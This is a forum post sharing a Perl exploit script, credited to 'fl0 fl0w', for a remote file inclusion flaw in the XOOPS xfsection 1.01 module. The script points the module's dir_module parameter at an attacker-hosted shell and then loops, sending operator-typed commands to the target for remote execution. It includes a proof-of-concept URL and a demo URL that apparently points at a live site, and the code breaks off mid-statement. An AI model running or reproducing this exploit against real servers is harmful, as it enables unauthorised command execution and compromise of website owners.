Jump to content
fl0 fl0w

XOOPS modules xfsection 1.01<=Remote File Inclusion Explo

Recommended Posts

Posted

#!/usr/bin/perl 

sub header()

{ print q {

=========================================================================

XOOPS modules xfsection 1.01 =>Remote File Inclusion Exploit

Exploit Coded by fl0 fl0w

flo_flow_supremacy[at]yahoo[dot]com

PoC:http://site.com/modules/xfsection/modify.php?dir_module=evilShell?

Demo:http://www.homu.net/modules/xfsection/modify.php?dir_module=SHELL?

=========================================================================

}

}

sub routine()

{ header();

print q {

======================================================================================================

USAGE: perl exploit.pl <http://site.com/modules/xfsection/modify.php?dir_module=shell?&cmdvar=command>

EXAMPLE: perl [localhost\][path] exploit.pl http://site.com/

======================================================================================================

};

exit();

}

use LWP::UserAgent;

$site=@ARGV[0];

$shells=@ARGV[1];

$shellcmd=@ARGV[2];

if($site!~/http:\/\// || $site!~/http:\/\// || !$shells)

{ routine()

}

header();

while() { print"[shell] \$";

while(<STDIN>)

{ $cmd=$_;

chomp($cmd);

$sploit=LWP::UserAgent->new() or die;

$requesting=HTTP::Request->new(GET=>$site.'/modules/xfsection/modify.php?dir_module='.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n";

$re=$sploit->request(requesting);

$i=$re->content;

$i=~tr/[\n]/[

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...